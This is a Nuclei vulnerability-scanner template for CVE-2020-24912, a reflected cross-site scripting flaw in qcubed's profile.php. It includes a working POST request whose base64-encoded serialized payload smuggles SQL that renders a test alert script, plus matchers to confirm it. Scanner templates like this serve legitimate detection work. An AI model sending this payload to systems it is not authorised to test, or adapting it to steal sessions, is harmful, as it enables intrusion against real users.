nuclei-templates/http/cves/2020/CVE-2020-24912.yaml

55 lines
2.3 KiB
YAML

id: CVE-2020-24912
info:
name: QCube Cross-Site-Scripting
author: pikpikcu
severity: medium
description: A reflected cross-site scripting vulnerability in qcubed (all versions including 3.1.1) in profile.php via the stQuery-parameter allows unauthenticated attackers to steal sessions of authenticated users.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
remediation: |
Upgrade to the latest version to mitigate this vulnerability.
reference:
- https://www.ait.ac.at/themen/cyber-security/pentesting/security-advisories/ait-sa-20210215-03
- https://github.com/qcubed/qcubed/pull/1320/files
- https://nvd.nist.gov/vuln/detail/CVE-2020-24912
- http://seclists.org/fulldisclosure/2021/Mar/30
- http://qcubed.com
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2020-24912
cwe-id: CWE-79
epss-score: 0.00346
epss-percentile: 0.71607
cpe: cpe:2.3:a:qcubed:qcubed:*:*:*:*:*:*:*:*
metadata:
max-request: 3
vendor: qcubed
product: qcubed
tags: cve2020,cve,qcubed,xss,seclists
http:
- method: POST
path:
- "{{BaseURL}}/assets/_core/php/profile.php"
- "{{BaseURL}}/assets/php/profile.php"
- "{{BaseURL}}/vendor/qcubed/qcubed/assets/php/profile.php"
body: "intDatabaseIndex=1&StrReferrer=somethinxg&strProfileData=YToxOntpOjA7YTozOntzOjEyOiJvYmpCYWNrdHJhY2UiO2E6MTp7czo0OiJhcmdzIjthOjE6e2k6MDtzOjM6IlBXTiI7fX1zOjg6InN0clF1ZXJ5IjtzOjExMjoic2VsZWN0IHZlcnNpb24oKTsgc2VsZWN0IGNvbnZlcnRfZnJvbShkZWNvZGUoJCRQSE5qY21sd2RENWhiR1Z5ZENnbmVITnpKeWs4TDNOamNtbHdkRDRLJCQsJCRiYXNlNjQkJCksJCR1dGYtOCQkKSI7czoxMToiZGJsVGltZUluZm8iO3M6MToiMSI7fX0K="
headers:
Content-Type: application/x-www-form-urlencoded
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<script>alert('xss')</script>"
- type: word
part: header
words:
- 'Content-Type: text/html'
# digest: 490a0046304402201284fc9743bbc71a2debc287e5b7df8dd6c308b45e77fae4f747b7b6898bb91202204e779ee77aab819050cc1bb71ab2186a94731f6917e8dc308a48919697259d0a:922c64590222798bb761d5b6d8e72950